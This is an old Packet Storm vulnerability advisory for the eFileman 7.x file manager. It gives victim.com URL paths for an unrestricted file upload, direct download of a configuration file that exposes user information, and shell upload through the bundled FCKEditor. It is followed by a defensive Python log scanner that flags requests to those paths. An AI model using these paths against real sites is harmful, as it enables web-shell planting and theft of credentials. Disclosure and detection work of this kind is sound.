efileman-multi.txt

2007-10-23T00:00:00
ID PACKETSTORM:60351
Type packetstorm
Reporter Xcross87
Modified 2007-10-23T00:00:00

Description

                                        
`Software : eFileman  
Version : 7.x (tested on 7.1.0.87-88)  
Found by : Xcross87  
  
A. Remote File Upload Vulnerability :  
  
Xploit :  
  
http://victim.com/[path]/upload.html  
http://victim.com/[path]/cgi-bin/efileman/upload.cgi  
  
The uploaded files are stored in :  
http://victim.com/[path]/uploads/upload_file.xxx  
  
B. Direct Access to or Download of the Configuration File :  
Xploit :  
http://victim.com/[path]/cgi-bin/efileman/efileman_config.pm <-- check user information  
  
C. FCKEditor Inclusion.  
For the full eFileman installation pack, which includes FCKEditor, an attacker can upload a shell through FCKEditor's upload vulnerability  
  
=== Xcross87 | HCETeam Xploiter ===  
`
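
A defender-side check for issues A to C above, added here as an example that is not part of the original advisory: it scans web access logs for requests to the paths the advisory names and reports whether they were served. The log format, the script-extension list, the `/files` prefix and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache/nginx common or combined log format (assumed); only the fields used are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) '
)
# Extensions treated as executable content under uploads/ (assumed list, adjust per server).
SCRIPT_EXT = re.compile(r"\.(?:cgi|pl|pm|php\d?|phtml|asp|aspx|jsp|sh|py)$")


def classify(line):
    """Return (ip, finding, path) for a log line touching the advisory's paths, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the query string, decode %xx escapes and fold case before matching.
    path = unquote(m["url"].split("?", 1)[0]).lower()
    method, served = m["method"], m["status"].startswith("2")
    if path.endswith("/cgi-bin/efileman/efileman_config.pm"):
        finding = "config-exposed" if served else "config-probe-blocked"
    elif path.endswith("/cgi-bin/efileman/upload.cgi") and method == "POST" and served:
        finding = "upload-cgi-post"
    elif "/uploads/" in path and SCRIPT_EXT.search(path) and served:
        finding = "uploaded-script-served"
    elif "fckeditor" in path and method == "POST" and served:
        finding = "fckeditor-post"  # assumes the bundled editor's path contains its name
    else:
        return None
    return (m["ip"], finding, path)


def scan(lines):
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges), not taken from a real server.
SAMPLE = [
    '203.0.113.7 - - [23/Oct/2007:10:01:02 +0000] "GET /files/upload.html HTTP/1.1" 200 1432',
    '203.0.113.7 - - [23/Oct/2007:10:01:09 +0000] "POST /files/cgi-bin/efileman/upload.cgi HTTP/1.1" 200 512',
    '203.0.113.7 - - [23/Oct/2007:10:01:15 +0000] "GET /files/uploads/report.pdf HTTP/1.1" 200 88211',
    '203.0.113.7 - - [23/Oct/2007:10:01:20 +0000] "GET /files/uploads/x.PHP?a=1 HTTP/1.1" 200 40',
    '198.51.100.23 - - [23/Oct/2007:10:05:00 +0000] "GET /files/cgi-bin/efileman/efileman%5Fconfig.pm HTTP/1.1" 200 2048',
    '198.51.100.23 - - [23/Oct/2007:10:06:00 +0000] "GET /files/cgi-bin/efileman/efileman_config.pm HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```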